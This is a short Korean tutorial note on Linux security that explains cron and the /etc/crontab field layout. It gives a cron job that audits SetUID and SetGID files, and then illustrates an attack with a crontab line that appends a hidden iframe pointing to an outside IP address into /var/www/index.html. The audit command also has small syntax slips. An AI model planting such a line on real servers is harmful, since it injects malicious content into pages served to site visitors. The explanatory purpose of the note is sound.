[Linux 보안] cron, crontab

cron: 일정한 시간에 자동으로 명령을 실행하는 프로세스.

 

/etc/crontab 파일에 설정된 것을 읽어서 작업 수행.

 

 

/etc/crontab 파일 내용

 

좌측부터 (분) (시) (일) (월) (요일) (사용자) (명령어)

 

 

 

 

 

 

 

---

 

1. cron이 중요한 이유

1.1. cron을 이용한 보안 취약점 검사 자동화

# SetUID, SetGID, Sticky Bit 설정된 파일 점검.

* 12 * * * root find / -user root -type f \(-perm -04000 -o -perm -02000\) -xdev -exec ls -al { } \; >> testlog.txt 2> /dev/null

 

 

1.2. cron을 이용한 악성코드 실행 자동화

# 공격자가 crontab파일에 명령어를 삽입

* 12 * * * root echo <iframe src="10.10.10.10"></iframe> >> /var/www/index.html